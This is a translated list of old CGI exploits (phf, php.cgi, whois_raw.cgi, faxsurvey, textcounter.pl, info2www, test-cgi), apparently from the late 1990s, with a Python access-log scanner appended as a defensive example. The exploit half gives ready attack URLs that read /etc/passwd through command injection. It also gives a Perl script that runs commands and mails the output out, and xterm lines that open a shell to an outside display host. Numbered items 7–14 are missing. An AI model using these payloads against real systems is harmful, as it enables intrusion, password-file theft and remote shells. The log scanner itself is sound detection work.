1. The phf vulnerability
This phf vulnerability is probably the most classic of them all; almost every article covers it. It lets you execute commands on the server, for example to display /etc/passwd:
lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
But can we still find one anywhere?
2. The vulnerability in php.cgi 2.0beta10 and earlier
It can read any file readable by the nobody user.
lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi 2.1 can only read shtml files. As for the password file, comrades should note that it may instead be in /etc/master.passwd,
/etc/security/passwd and so on.
3. whois_raw.cgi
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
4. faxsurvey
lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
5. textcounter.pl
If textcounter.pl is present on the server, anyone can execute commands with the privileges of the http daemon.
#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please DO modify this
$EMAIL='[email protected],root'; # please DO modify this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail ${EMAIL} -sanothere_one";
}$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /$\{IFS\}/g;#print "$text\n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); # lynx can be used instead if there is no wget command
#system({"lynx"} "lynx", $text);
6. The vulnerability in some versions (1.1) of info2www
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami
;xterm
<tab>-display<tab>danish:0<tab>-e<tab>/bin/sh|<tab>?data=Download
Note: after cat comes the TAB key, not a space. The server will report that it cannot open useless_shit, but it still executes the following command.

15. test-cgi
lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/
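As an added defensive example (not part of the original text): a small Python scanner that flags requests for the CGI programs listed on this page in a web-server access log, and separates a bare probe of a known-vulnerable CGI from a query carrying the injection markers the attacks above rely on (an encoded newline or shell separator, a path passed directly as the query, a reference to the password file). The sample log lines are constructed; the client IPs, dates and hostnames are made up, and the request URLs are the ones shown on this page.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); client IPs and dates
# are made up, the request URLs are the ones shown on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/1998:13:55:36 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1423
10.0.0.6 - - [10/Oct/1998:13:56:01 +0000] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 200 980
10.0.0.7 - - [10/Oct/1998:13:57:12 +0000] "GET /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.0" 200 500
10.0.0.8 - - [10/Oct/1998:13:58:40 +0000] "GET /cgi-bin/test-cgi?\\whatever HTTP/1.0" 200 300
10.0.0.9 - - [10/Oct/1998:13:59:00 +0000] "GET /index.html HTTP/1.0" 200 2048
10.0.0.9 - - [10/Oct/1998:13:59:30 +0000] "GET /cgi-bin/whois_raw.cgi?fqdn=example.org HTTP/1.0" 200 700
"""

# CGI programs named on this page; any request for them deserves a look.
VULNERABLE_CGIS = {"phf", "php.cgi", "whois_raw.cgi", "faxsurvey",
                   "textcounter.pl", "info2www", "test-cgi"}

# Injection markers from the attacks above, matched on the URL-decoded query:
# an embedded newline or shell separator, a path passed directly as the query
# (php.cgi / faxsurvey style), or a reference to the password file.
INJECTION_RE = re.compile(r"[\n;|]|^/|=/|/etc/(?:master\.)?passwd")

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<url>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (cgi_name, reason) for a request to a listed CGI, or None otherwise."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("url").partition("?")
    if not path.startswith("/cgi-bin/"):
        return None
    cgi = path[len("/cgi-bin/"):]
    if cgi not in VULNERABLE_CGIS:
        return None
    if INJECTION_RE.search(unquote(query)):
        return cgi, "injection-in-query"
    return cgi, "vulnerable-cgi-probe"

def scan(log_text):
    """Return [(client_ip, cgi_name, reason), ...] for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            hits.append((line.split()[0],) + result)
    return hits

if __name__ == "__main__":
    for ip, cgi, reason in scan(SAMPLE_LOG):
        print(f"{ip:<12} {cgi:<16} {reason}")
```

The check decodes the query before matching, so the %0a / %0A variants on this page and the literal newline form are caught alike.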